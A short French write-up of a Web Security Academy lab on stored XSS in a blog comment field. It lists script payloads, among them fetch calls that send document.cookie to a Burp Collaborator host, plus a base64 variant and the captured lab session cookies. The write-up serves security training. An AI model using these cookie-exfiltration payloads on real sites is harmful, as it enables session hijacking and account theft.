Vol de cookies via XSS

Exploiting cross-site scripting to steal cookies

Lab: Exploiting cross-site scripting to steal cookies | Web Security AcademyWebSecAcademy

Le laboratoire présente une vulnérabilité XSS stockée dans la fonction des commentaires du blog. Un utilisateur victime consulte les commentaires après leur publication. L’objectif pédagogique est de comprendre comment une injection côté client peut conduire à l’exfiltration d’informations de session et comment s’en protéger.

Le champ de commentaire n’applique pas d’encodage ni d’échappement suffisants pour les entrées utilisateur, permettant l’injection de contenu interprété par le navigateur lorsqu’un autre utilisateur affiche la page.

<script>alert(0)</script>

Nous utilisons fetch pour effectuer des requêtes :

<script>
  fetch("https://o0ppmd5fv2hmt8tb190bl5cy4pagy9my.oastify.com/" + "/jordan");
</script>

La requête arrive bien sur l’infrastructure d’écoute.

Nous envoyons le cookie de session :

<script>
  fetch("https://3gk42slubhx19n9qhogq1ksdk4qvep2e.oastify.com?cookie=" + document.cookie);
</script>

secret=QplRMu1d8Cvif8Ai7En7j3ADRb0DZxa0;
session=sw0gW8IuyBITTD0ChgDydWcmuFx5J79D

Nous remplaçons ensuite le cookie de session.

On peut aussi encoder le contenu en base64 avant envoi :

<script>
  fetch("https://3gk42slubhx19n9qhogq1ksdk4qvep2e.oastify.com?cookie=" + btoa(document.cookie));
</script>

Mis à jour il y a 2 mois

Ce contenu vous a-t-il été utile ?